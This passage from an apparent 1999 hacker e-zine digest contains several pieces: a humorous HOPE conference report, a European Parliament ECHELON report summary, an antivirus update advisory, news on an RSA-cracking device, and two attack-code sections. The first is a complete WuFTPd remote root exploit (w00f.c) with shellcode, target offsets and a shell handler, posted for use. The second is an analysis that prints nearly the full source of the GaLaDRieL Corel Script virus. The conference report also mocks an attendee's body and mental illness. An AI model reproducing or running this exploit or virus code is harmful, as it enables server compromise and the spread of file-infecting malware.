can't get their own people to tell them what they need to know."
Sprint is using what they consider to be the greatest access mechanism since the guillotine. For
all of us road warriors out there who are forever needing long distance voice service from the
Whattownisthis, USA airport, Sprint thinks they have a better mousetrap. No more messing
finger entry. No more pass-codes or PIN's.
I remember at the Washington National Airport last summer I was using my Cable and
Wireless long distance access card and entered the PIN and to my surprise, an automated voice
came on and said, "Sorry, you entered your PIN with the wrong finger. Please try again."
Sprint says they've solved this thorny cumbersome problem with a service called "The Voice
Fone Card". Instead of memorizing another 64 digit long PIN, you just speak into the phone:
"Hi, it's me. Give me dial tone or give me death." The voice recognition circuits masturbate
for a while to determine if it's really you or not.
Good idea. But according to Strat, not a good execution. Strat found that someone performing
a poor imitation of his voice was enough to break through the front door with ease. Even a
poor tape recording played back over a cheap cassette speaker was sufficient to get through
Sprint's new whiz-banger ID system.
Strat laughed that Sprint officials said in defense, "We didn't say it was secure: just
convenient."
Smart. Oh, so smart.
* * * * *
"If my generation of the late 60's and early 70's had had the same technology you guys have
there never would have been an 80's." This was how I opened my portion of the author's panel.
The authors panel was meant to give HOPE hackers insight into how they are perceived from
the so-called outside. I think the session achieved that well, and I understand the videos will be
available soon.
The question of electronic transvestites on AOL came up to everyone's enjoyment, and all of us
on the panel retorted with a big, "So what?" If you have cyber-sex with someone on the 'Net
and enjoy it, what the hell's the difference? Uncomfortable butt shifting on chairs echoed how
the largely male audience likely feels about male-male sex regardless of distance.
"Imagine," I kinda said, "that is a few years you have a body suit which not only can duplicate
your moves exactly, but can touch you in surprisingly private ways when your suit is connected
to another. In this VR world, you select the gorgeous woman of choice to virtually occupy the
other suit, and then the two of you go for it. How do you react when you discover that like
Lola, 'I know what I am, and what I am is a man and so's Lola.'" Muted acknowledgment that
unisex may come to mean something entirely different in the not too distant future.
"Ooh, ooh, please call on me." I don't mean to be insulting, but purely for identification
purposes, the woman behind the voice bordered on five foot four and four hundred pounds.
Her bathtub had stretch marks.
I never called on her but that didn't stop her.
"I want to know what you think of how the democratization of the internet is affected by the
differences between the government and the people who think that freedom of the net is the
most important thing and that government is fucked but for freedom to be free you have to
have the democracy behind you which means that the people and the government need to, I
mean, you know, and get along but the sub culture of the hackers doesn't help the government
but hackers are doing their thing which means that the democracy will not work , now I know
that people are laughing and giggling (which they were in waves) but I'm serious about this and
I know that I have a bad case of hypomania but the medication is working so it's not a bad as it
could be. What do you think?"
I leaned forward into the microphone and gave the only possible answer. "I dunno. Next."
The thunderous round of applause which followed my in-depth response certainly suggested
that my answer was correct. Not politically, not technically, but anarchistically. Flexibility
counts.
* * * * *
HOPE was attended by around one thousands folks, and the Hotel Filthadelphia still stands.
(Aw shucks.)
My single biggest complaint was not that the schedules slipped by an hour or two or three;
sessions at conferences like this keep going if the audience is into them and they are found to
be educational and productive. So an hour session can run into two if the material and
presentations fit the mood. In theory a boring session could find itself kama kazi'd into early
melt-down if you have the monotone bean counter from hell explaining the distributed
statistical means of aggregate synthetic transverse digitization in composite analogous integral
fruminations. (Yeah, this audience would buy off on that in a hot minute.) But there were not
any bad sessions. The single track plenary style attracted hundred of hackers for every event.
Emmanuel and friends picked their panels and speakers well. When dealing with sponge-like
minds who want to soak up all they can learn, even in somewhat of a party atmosphere, the
response is bound to be good.
My single biggest complaint was the registration nightmare. I'd rather go the DMV and stand
in line there than get tagged by the seemingly infinite lines at HOPE. At DefCon early
registration was encouraged and the sign up verification kept simple.
For some reason I cannot thoroughly (or even partially) fathom, a two step procedure was
chosen. Upon entering, and before the door narcs would let anyone in, each attendee had to be
assigned a piece of red cardboard with a number on it. For the first day you could enter the
'exhibits' and auditorium without challenge. But by Day 2 one was expected to wait in line for
the better part of a week, have a digital picture taken on a computer tied to a CCD camera, and
then receive a legitimate HOPE photo-ID card. What a mess. I don't have to beat them up on it
too bad; they know the whole scheme was rotten to the core.
I waited till near the end of Day 2 when the lines were gone and the show was over. That's
when I got my Photo ID card. I used the MIB's photo ID card the rest of the time.
HOPE was a lot of fun and I was sorry to see it end, but as all experiences, there is a certain
amount of letdown. After a great vacation, or summer camp, or a cruise, or maybe even after
Woodstock, a tear welts up. Now I didn't cry that HOPE was over, but an intense 48 hours
with hackers is definitely not your average computer security convention that only rolls from
9AM to Happy Hour. At a hacker conference, you snooze, you lose. You never know what is
going to happen next - so much is spontaneous and unplanned - and it generally is highly
educational, informative and entertaining.
Computer security folks: you missed an event worth attending. You missed some very funny
entertainment. You missed some fine young people dressed in some fine garb. You missed the
chance to meet with your perceived 'enemy'. You missed the opportunity to get inside the
heads of the generation that knows more about keyboards than Huck Finning in suburbia. You
really missed something, and you should join Robert MIB Steele and I at the next hacker
conference.
* * * * *
If only I had known.
If only I had known that tornadoes had been dancing up and down 5th avenue I would have
stayed at the Hotel Filthadelphia for another night.
La Guardia airport was closed. Flights were up to 6 hours delayed if not out and out canceled.
Thousands of stranded travelers hunkered down for the night. If only I had known.
Wait, wait. Hours to wait. And then, finally, a plane ready and willing to take off and swerve
and dive between thunderbolts and twisters and set me on my way home.
My kids were bouncing out of the car windows when my wife picked me up at the airport
somewhere in the vicinity of 1AM.
"Not too late are you dear?" Sweet Southern Sarcasm from my Sweet Southern Wife.
"Don't blame me," I said in all seriousness. "It was the hackers. They caused the whole thing."
* * * * *
Notice: This article is free, and the author encourages responsible widespread electronic
distribution of the document in full, not piecemeal. No fees may be charged for its use. For
hard copy print rights, please contact the author and I'll make you an offer you can't refuse.
The author retains full copyrights to the contents and the term Cyber-Christ.
Winn is the author of "Terminal Compromise", a novel detailing a fictionalized account of a
computer war waged on the United States. After selling well as a book-store-book, Terminal
Compromise was placed on the Global Network as the world's first Novel-on-the-Net
Shareware and has become an underground classic. (Gopher TERMCOMP.ZIP)
His new non-fiction book, "Information Warfare: Chaos on the Electronic Superhighway"
is a compelling, non-technical analysis of personal privacy, economic and industrial
espionage and national security. He calls for the creation of a National Information Policy, a
Constitution in Cyberspace and an Electronic Bill of Rights.
He may be reached at INTER.PACT, 11511 Pine St., Seminole, FL. 34642. 813-393-6600,
fax 813-393-6361, E-Mail: P00506@psilink.com.
# # #
@HWA
42.0 IC2000, Interception Capabilities 2000 and ECHELON
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
7 May 1999. Thanks to Anonymous.
http://jya.com/crypto.htm
http://jya.com/ic2000-dc.htm
7 May 1999
Interception Capabilities 2000 ("IC2000")
The IC2000 report on communications interception and ECHELON was approved
as a working document by the Science and Technology Options Assessment
Panel of the European Parliament (STOA) at their meeting in Strasbourg on 6
May 1999.
Key findings of the IC2000 report
� Comprehensive systems exist to access, intercept and
process every important modern form of communications, with few exceptions
(section 2, technical annexe);
� The report provides original new documentary and other
evidence about the ECHELON system and its role in the interception of
communication satellites (section 3). In excess of 120 satellite based
systems are currently in simultaneous operation collecting intelligence
(section 2). Submarines are routinely used to access and intercept
undersea communications systems.
� There is wide-ranging evidence indicating that major governments
are routinely utilising communications intelligence to provide commercial
advantage to companies and trade.
� Although "word spotting" search systems to automatically
select telephone calls of intelligence interest are not thought to be
effective, speaker recognition systems in effect, "voiceprints" have
been developed and are deployed to recognise the speech of targeted
individuals making international telephone calls;
� Recent diplomatic initiatives by the United States government
seeking European agreement to the "key escrow" system of cryptography
masked intelligence collection requirements, forming part of a long-term
program which has undermined and continues to undermine the communications
privacy European companies and citizens;
� Interception for legally authorised domestic interception and
interception for clandestine intelligence purposes must be sharply
distinguished. A clear boundary between law enforcement and "national
security" interception activity is essential to the protection of human
rights and fundamental freedoms.
� Providing the measures called for in the 1998 Parliamentary
resolution on "Transatlantic relations/ECHELON measures may be facilitated
by developing an in-depth understanding of present and future Comint
capabilities. Protective measures may best be focused on defeating
hostile Comint activity by denying access or, where this is impractical or
impossible, preventing processing of message content and associated traffic
information by general use of cryptography.
� In relation to the manner in which Internet browsers and other
software is deliberately weakened for use by other than US citizens,
consideration could be given to a countermeasure whereby, if systems with
disabled cryptographic systems are sold outside the United States, they
should be required to conform to an "open standard" such that third parties
and other nations may provide additional applications which restore the
level of security to at least that enjoyed by domestic US customers.
� It should be possible to define and enforce a shared interest in
implementing measures to defeat future external Sigint activities directed
against European states, citizens and commercial activities.
The full report with all images:
http://jya.com/ic2000.zip [918K]
A text-only version (with selected images):
http://jya.com/ic2000-text.htm (356K)
Text-only Zipped:
http://jya.com/ic2000-text.zip (189K)
Source: http://www.europarl.eu.int/dg4/stoa/en/news/1999/apr99.htm#workdocs
STOA Newsletter
April 1999
Strasbourg, 14 April 1999
PE 167.871
[Excerpt]
WORKING DOCUMENTS, STUDIES, PAPERS, BRIEFS
Work in Progress - The following Working documents are being presented to the STOA Panel
in April:
Workplan 1998 ...
Development of surveillance technology and risk of abuse of economic information (Appraisal
of technologies of political control)
(1)The legality of the interception of electronic communications: A concise survey of the
principal legal issues and instruments under international, European and national law, by
Chris ELLIOTT, Surrey, UK
Final Study, Working document for the STOA Panel, Workplan 1998 - 98/14/01, EN, April
1999, PE 168.184/part 2/4
(2)Encryption and cryptosystems in electronic surveillance: A survey of the technology
assessment issues, by Franck LEPR�VOST, Technische Universit�t Berlin, Germany
Final Study, Working document for the STOA Panel, Workplan 1998 - 98/14/01, EN, April
1999, PE 168.184/part 3/4
(3)The state of the art in Communications Intelligence (COMINT) of automated
processing for intelligence purposes of intercepted broadband multi-language leased or
common carrier systems, and its applicability to COMINT targeting and selection,
including speech recognition, by Duncan CAMPBELL, IPTV Ltd., Edinburgh, UK
Final Study, Working document for the STOA Panel, Workplan 1998 - 98/14/01, EN, April
1999, PE 168.184/part 4/4
[No information on part 1/4]
@HWA
43.0 WuFTPd exploit w00f.c
~~~~~~~~~~~~~~~~~~~~~~
Date: Sat, 1 May 1999 21:59:50 +0200
Reply-To: Mixter <mixter@MIXTER.ORG>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Mixter <mixter@MIXTER.ORG>
Subject: wuftp2.4.2academ beta 12-18 exploit
To: BUGTRAQ@netspace.org
this works on a lot of wu-ftpd`s
also uses other commands than MKD to
exploit realpath() overflow
/*
* Remote/local exploit for wu-ftpd [12] through [18]
* gcc w00f.c -o w00f -Wall -O2
*
* Offsets/padding may need to be changed, depending on remote daemon
* compilation options. Try offsets -5000 to 5000 in increments of 100.
*
* Note: you need to use -t >0 for -any- version lower than 18.
* Coded by smiler and cossack
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
/* In a beta[12-17] shellcode_A overflow, we will not see responses
to our commands. Add option -c (use chroot code) to fix this. */
unsigned char hellcode_a[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20"
"\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
"\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd"
"\x80\xe8\xcf\xff\xff\xff\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48";
unsigned char hellcode_b[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
"\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
"\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
"\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
"\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
"\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
"\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
"\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
"\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";
char *Fgets(char *s,int size,FILE *stream);
int ftp_command(char *buf,int success,FILE *out,char *fmt,...);
int double_up(unsigned long blah,char *doh);
int resolv(char *hostname,struct in_addr *addr);
void fatal(char *string);
int usage(char *program);
int tcp_connect(struct in_addr host,unsigned short port);
int parse_pwd(char *in,int *pwdlen);
void RunShell(int thesock);
struct type {
unsigned long ret_address;
unsigned char align; /* Use this only to offset \xff's used */
signed short pad_shift; /* how little/much padding */
unsigned char overflow_type; /* whether you have to DELE */
char *name;
};
/* ret_pos is the same for all types of overflows, you only have to change
the padding. This makes it neater, and gives the shellcode plenty of
room for nops etc
*/
#define RET_POS 190
#define FTPROOT "/home/ftp"
/* the redhat 5.0 exploit doesn't work at the moment...it must be some
trite error i am overlooking. (the shellcode exits w/ code 0375) */
struct type types[]={
{ 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", },
{ 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", },
{ 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", },
{ 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", },
{ 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", },
{ 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", },
{ 0,0,0,0,NULL }
};
struct options {
char start_dir[20];
unsigned char *shellcode;
unsigned char chroot;
char username[10];
char password[10];
int offset;
int t;
} opts;
/* Bit of a big messy function, but hey, its only an exploit */
int main(int argc,char **argv)
{
char *argv0,ltr;
char outbuf[1024], inbuf[1024], ret_string[5];
int pwdlen,ctr,d;
FILE *cin;
int fd;
struct in_addr victim;
argv0 = strdup(argv[0]);
*opts.username = *opts.password = *opts.start_dir = 0;
opts.chroot = opts.offset = opts.t = 0;
opts.shellcode = hellcode_a;
while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){
switch (d) {
case 'c':
opts.shellcode = hellcode_b;
opts.chroot = 1;
break;
case 's':
strcpy(opts.start_dir,optarg);
break;
case 'o':
opts.offset = atoi(optarg);
break;
case 't':
opts.t = atoi(optarg);
if ((opts.t < 0)||(opts.t>5)) {
printf("Dont have that type!\n");
exit(-1);
}
}
}
argc -= optind;
argv += optind;
if (argc < 3)
usage(argv0);
if (!resolv(argv[0],&victim)) {
perror("resolving");
exit(-1);
}
strcpy(opts.username,argv[1]);
strcpy(opts.password,argv[2]);
if ((fd = tcp_connect(victim,21)) < 0) {
perror("connect");
exit(-1);
}
if (!(cin = fdopen(fd,"r"))) {
printf("Couldn't get stream\n");
exit(-1);
}
Fgets(inbuf,sizeof(inbuf),cin);
printf("%s",inbuf);
if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0)
fatal("Bad username\n");
if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0)
fatal("Bad password\n");
if (*opts.start_dir)
if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0)
fatal("Couldn't change dir\n");
if (ftp_command(inbuf,257,cin,"PWD\n")<0)
fatal("PWD\n");
if (parse_pwd(inbuf,&pwdlen) < 0)
fatal("PWD\n");
srand(time(NULL));
printf("Making padding directorys\n");
for (ctr = 0;ctr < 4;ctr++) {
ltr = rand()%26 + 65;
memset(outbuf,ltr,194);
outbuf[194]=0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
}
/* Make padding directory */
ctr = 124 - (pwdlen - types[opts.t].align);//180
//ctr = 152 - (pwdlen - types[opts.t].align);
ctr -= types[opts.t].pad_shift;
if (ctr < 0) {
exit(-1);
}
memset(outbuf,'A',ctr+1);
outbuf[ctr] = 0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
memset(outbuf,0x90,195);
d=0;
for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++)
outbuf[ctr] = opts.shellcode[d++];
double_up(types[opts.t].ret_address-opts.offset,ret_string);
strcpy(outbuf+RET_POS,ret_string);
strcpy(outbuf+RET_POS+strlen(ret_string),ret_string);
printf("Press any key to send shellcode...\n");
getchar();
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (types[opts.t].overflow_type == 1)
if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0)
fatal("DELE\n");
/* HEH. For type 1 style we add a dele command. This overflow
occurs in delete() in ftpd.c. The cause is realpath() in realpath.c
not checking bounds correctly, overwriting path[] in delete(). */
RunShell(fd);
return(1);
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
return;
}
int double_up(unsigned long blah, char *doh)
{
int a;
unsigned char *ptr,*ptr2;
bzero(doh,6);
ptr=doh;
ptr2=(char *)&blah;
for (a=0;a<4;a++) {
*ptr++=*ptr2;
if (*ptr2==0xff) *ptr++=0xff;
ptr2++;
}
return(1);
}
int parse_pwd(char *in, int *pwdlen)
{
char *ptr1,*ptr2;
/* 257 "/" is current directory */
ptr1 = strchr(in,'\"');
if (!ptr1) return(-1);
ptr2 = strchr(ptr1+1,'\"');
if (!ptr2) return(-1);
*ptr2 = 0;
*pwdlen = strlen(ptr1+1);
/* If its just "/" then it contributes nothing to the RET_POS */
if (*pwdlen==1) *pwdlen -= 1;
printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen);
return(1);
}
int tcp_connect(struct in_addr host,unsigned short port)
{
struct sockaddr_in serv;
int fd;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&host,sizeof(struct in_addr));
serv.sin_port = htons(port);
serv.sin_family = AF_INET;
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) {
return(-1);
}
return(fd);
}
int ftp_command(char *buf,int success,FILE *out,char *fmt,...)
{
va_list va;
char line[1200];
int val;
va_start(va,fmt);
vsprintf(line,fmt,va);
va_end(va);
if (write(fileno(out),line,strlen(line)) < 0)
return(-1);
bzero(buf,200);
while(1) {
Fgets(line,sizeof(line),out);
#ifdef DEBUG
printf("%s",line);
#endif
if (*(line+3)!='-') break;
}
strncpy(buf,line,200);
val = atoi(line);
if (success != val) return(-1);
return(1);
}
void fatal(char *string)
{
printf("%s",string);
exit(-1);
}
char *Fgets(char *s,int size,FILE *stream)
{
char *ptr;
ptr = fgets(s,size,stream);
//if (!ptr)
//fatal("Disconnected\n");
return(ptr);
}
int resolv(char *hostname,struct in_addr *addr)
{
struct hostent *res;
if (inet_aton(hostname,addr))
return(1);
res = gethostbyname(hostname);
if (res == NULL)
return(0);
memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
return(1);
}
int usage(char *program)
{
fprintf(stderr,"Usage: %s <host> <username> <password> [-c] [-s start_dir]\n",program);
fprintf(stderr,"\t[-o offset] [-t type]\n");
fprintf(stderr,"types:\n");
fprintf(stderr,"0 - %s\n", types[0].name);
fprintf(stderr,"1 - %s\n", types[1].name);
fprintf(stderr,"2 - %s\n", types[2].name);
fprintf(stderr,"3 - %s\n", types[3].name);
fprintf(stderr,"4 - %s\n", types[4].name);
fprintf(stderr,"5 - %s\n", types[5].name);
fprintf(stderr,"\n");
exit(0);
}
/* -EOF- */
@HWA
44.0 VirusScan NT advisory from Simple Nomad
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.3.96.981029195851.113B-100000@vortex.nmrc.org>
Date: Thu, 29 Oct 1998 20:01:56 -0600
Reply-To: Simple Nomad <thegnome@NMRC.ORG>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Simple Nomad <thegnome@NMRC.ORG>
Subject: NAI AntiVirus Update Problem
To: BUGTRAQ@netspace.org
_______________________________________________________________________________
Nomad Mobile Research Centre
A D V I S O R Y
www.nmrc.org
Simple Nomad [thegnome@nmrc.org]
05May1999
_______________________________________________________________________________
Platform : Microsoft NT 4.0
Application : Network Associates' VirusScan NT
Severity : Medium
Synopsis
--------
Network Associates VirusScan NT (formerly McAfee VirusScan NT) version
4.0.2 does not properly update virus signature definition files under
certain conditions, and will falsely report it is up to date during manual
updates. This impacts both NT Server and Workstation.
Tested configuration
--------------------
Microsoft NT Server 4.0 w/SP3, Network Associates VirusScan NT version
4.0.2.
Microsoft NT Workstation 4.0 w/SP3 and SP4, Network Associates VirusScan
NT version 4.0.2.
Pre-4.0.2 versions of VirusScan NT were not tested, nor were versions for
other platforms, such as Windows 95 or 98.
Bug(s) report
-------------
Network Associates VirusScan NT has a feature that allows for a user to
update the virus definitions file via ftp. This task can also be automated
via the VirusScan NT AntiVirus Console. In version 4.0.2, the scan engine
holds open the main definition file scan.dat (located in the VirusScan NT
directory) during the ftp process, preventing the file from being
overwritten with the new version. The engine itself apparently does not
check return codes and will not notify the user that the file was not
updated. Worse, the Application Log is updated as if the install completed
properly, therefore subsequent downloads of new definition files will not
update the scan.dat properly. Subsequent manual downloads will in fact
tell you that you already have the latest definition file when in fact you
do not.
NMRC was not able to make this error occur consistently, and we strongly
suspect that a race condition exists where the updates will occasionally
work, but we were able to duplicate the error condition most of the time.
Testing was done in NMRC labs, and at two corporate locations.
To verify the proper definitions file, check the About box from the
AntiVirus Console program for the latest date next to the text "Created
On". If after a manual or automatic update this date does not change, your
definitions have not been properly updated.
The implication here is that the administrator or end user believes their
system is protected when it in fact is not.
Solution/Workaround
-------------------
Upgrade to Network Associates VirusScan NT version 4.0.3a, which resolves
the problem. Alternately, disable the VirusScan engine, wait several
seconds for the operating system to close the file, and manually copy the
definition files into the VirusScan NT directory. This second method will
place your log files out of sync with the definition files until the next
manual or automatic download, but this should not impact functionality.
It is recommended that you disable 4.0.2 (or even uninstall) before
performing an upgrade to 4.0.3a due to other problems we encountered
during the testing of this product, such as being unable to properly stop
the VirusScan services before upgrading. Once again, these problems were
inconsistent but happened several times on several systems.
One further note, in a restricted NT workstation environment, it is next
to impossible to have the user upgrade the product themselves. Local admin
rights are required to make this happen, and this will require a visit
from an individual with adequate rights to the workstation to complete the
upgrade.
Comments
--------
Network Associates has been notified and recommend the upgrade to 4.0.3a
to resolve the problem. This problem was discovered while investigating
why upgraded machines were still infected by various Microsoft Word macro
virii after they had been upgraded to the latest definition files.
Network Associates can be reached at http://www.nai.com/. Unfortunately
at the time of this writing the ftp location of the 4.x definition files
was not present. It's supposed to be at
ftp://ftp.nai.com/pub/antivirus/update/4.x but had disappeared from the
server(s).
_______________________________________________________________________________
Simple Nomad //
thegnome@nmrc.org // ....no rest for the Wicca'd....
www.nmrc.org //
@HWA
45.0 New CorelDraw Virus
~~~~~~~~~~~~~~~~~~~
From http://www.403-security.org/
CorelDraw virus found
Astral 07.05.1999 17:15
HispaSec discovred virus in CorelDraw.This is first virus based on CorelDraw Script.Virus is named
GaLaDRieL.Once this virus gets in your computer it affects files by adding victima$ label in CSC file
once added also adds yo_estoy_en$ label in same CSC file and after both labels are added it
modifies LothLorien label.More about it on HispaSec.
6-5-1999 - HispaSec discovers the first virus for Corel Draw
We introduce "GaLaDRieL", the first virus ever based on
Corel Script, the computer language designed for Corel
Draw's task and script automation. Albeit its effects are not
harmful, we're undoubtedly dealing with an innovation in the
macro virus area which may open a new way of
development.
Corel Script is the language, based upon the popular
BASIC, designed for macro coding in the Corel pack. A
macro is a computer program which runs a series of
instructions so as to automate repetitive tasks, or to
simplify complex actions, as well as to ask for entries, view
messages or to swap information with other applications.
This is what Corel Draw calls "scripts", a kind of files with
"CSC" as extension, which are the victims of this new brand
virus.
In the first line of its code we can find the virus identification:
name, author, and virus writing group its author belongs to.
---------
REM ViRUS GaLaDRieL FOR COREL SCRIPT bY
zAxOn/DDT
---------
After this, the virus gets the system date and checks
whether it coincides with june 6th of any year. When this
happens, the virus jumps to a label called "Elessar", where
its payload can be found, which consists on displaying an
excerpt from "The Lord Of The Rings". Anyhow the program
eventually jumps to a label called "Palantir".
---------
fecha$=GetCurrDate ()
If Left(fecha$,1)="6" Then If Mid(fecha$,3,2)="06" Then Goto
Elessar
Goto Palantir
Elessar:
Mensajito$= "
Ai! lauri� lantar lassi s�rinen!.
Y�ni �n�time ve r�mar aldaron,
y�ni ve linte yuldar v�nier
mi oromardi lisse-miruv�reva
And�ne pella Vardo tellumar
nu luini yassen tintilar i eleni
�maryo airet�ri-lirinen.
...."
Titulo = "GaLaDRieL ViRUS bY zAxOn/DDT"
Messagebox Mensajito$,Titulo,64
----------
The virus looks for the first file containing the "CSC"
extension (Corel Script) with the attributes 32 or 128, which
stand for normal files. When it finds such a victim, the virus
opens it for reading and checks for the text string "REM
ViRUS", which determines whether the file has been
previously infected. When it finds a suitable victim according
to its own features, then assings the file name to the
variable called "victima$".
----------
Palantir:
nombre$=FindFirstFolder ("*.csc",32 or 128)
Do while not nombre$=""
Open nombre$ For Input As #1
Palacios_Intemporales:
Line Input #1,linea$
If linea$="" then goto Palacios_Intemporales
if victima_bool=1 Then Goto Esgaroth
If Instr(linea$,"REM ViRUS",1)=0 then
victima$=nombre$
victima_bool=1
End if
-----------
The virus then keeps on looking for files fitting its search
wildcard ("CSC" extension and attributes 32 or 128, by
means of the "FindNextFolder()" instruction). When the virus
finds an infected file through this second search, it proceeds
to store its file name into the "yo_estoy_en$" variable. Once
both the victim ("victima$") and the already infected file
("yo_estoy_en$") are ready, the virus jumps to a label called
"LothLorien". For those cases in which the virus is not able
of finding any of the two files mentioned above, the virus
skips the infection process and jumps to a new label, called
"Los_Puertos_Grises".
-----------
Esgaroth:
If Instr(linea$,"REM ViRUS",1)<> 0 Then
yo_estoy_en$=nombre$
conocimiento=1
End if
Close
If conocimiento=1 Then If victima_bool=1 Then Goto
LothLorien
nombre$=FindNextFolder ()
If nombre$="" Then Goto Los_Puertos_Grises
Loop
-----------
In its last stage we have the chance to find a rather peculiar,
bad optimized, way of infecting the victim file with the virus
body. The first step consists on deleting a temporal file
called "mallorn.tmp", which might be found in the system
because of previous infections. It renames then the victim
file to "mallorn.tmp", by means of the instruction "Rename
victima$,"mallorn.tmp",0". The last parameter ("0") indicates
that in those cases in which the "mallorn.tmp" file would
already exist (even though it was supposed to have been
previously deleted by the virus itself) it would be overwritten.
This is just a small example of the poor code optimization of
the infection routine.
After having performed the above operations, the virus opens
the file specified by the "yo_estoy_en$" variable for reading
and then the one pointed to by "victima$" for writing. After
this, and by means of a loop, GaLaDRieL parses its code,
line by line, until reaching the "REM END" string, which
tells the virus the process is done. It closes then both files
and reopens the victim file, this time in "Append" mode, in
order to attach, by means of this method, the code lines
which belong to the original script code, previously saved to
the "mallorn.tmp" file. Eventually the virus deletes one more
time the temporary file, and the last thing we find in its code
is the text line we've just talked about, the one which tells
GaLaDRieL where the tail of the virus body is located at.
-----------
LothLorien:
Kill "mallorn.tmp"
Rename victima$,"mallorn.tmp",0
Open yo_estoy_en$ For Input As #1
open victima$ For Output As #2
Do While Not Left(linea$,7)="REM END"
Line Input #1,linea$
Print #2,linea$
Loop
Line Input #1,linea$
Print #2,linea$
Close
Open victima$ For Append As #1
Open "mallorn.tmp" For Input As #2
Do While Not Eof(2)
Line Input #2,linea$
Print #1,linea$
Loop
Close
Kill "mallorn.tmp"
Los_Puertos_Grises:
REM END OF ViRUS GaLaDRieL bY zAxOn/DDT
------------
There's no doubt about the fact that we're talking about a
virus which won't travel too far, something to which we could
add its poor code optimization. >From this, it's not difficult
to guess that its author's purpose was to show the viability
of developing viruses in this new environment, leaving back
other kinds of more commonly infected victims. Suming up,
we're dealing with an innovating virus in which concerns to
the platform it's designed to work in, and that it can mean
the begin of a new macro virus family for Corel Draw.
Bernardo Quintero
@HWA
46.0 TWINKLE, the number crunching machine to attack RSA keys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.projectgamma.com/
http://www.projectgamma.com/news/16.html
Twinkle: The Magic Light That Breaks The Code
May 6, 1999, 22:45
Author: i_am_online
Twinkle and you're done, the magic light that breaks the code. Computer scientist Adi Shamir who is a co-creator of the RSA public key
algorithm has developed a computer that is light based and that can decode data to an extent far past what is normally used in
e-commerce. Its name is �Twinkle,� and Adi Shamir this Tuesday in Prague demonstrated it at the 1999 Eurocrypt conference.
Twinkle can find the correct key, efficiently, for decrypting messages that have been encrypted with 512-bit keys, said Shamir. The
Twinkle design goes with prior expectations about the consequence of RSA keys as long as 512 bits. But key sizes larger are still out of
reach aside Shamir's progress in code breaking.
What Twinkle stands for is "The Weizmann Institute Key Locating Engine." Twinkle is very different than that of the electronic design of a
normal computer; Twinkle is based solely on optoelectronics, which use light to transfer info digitally. Shamir predicts that the Twinkle
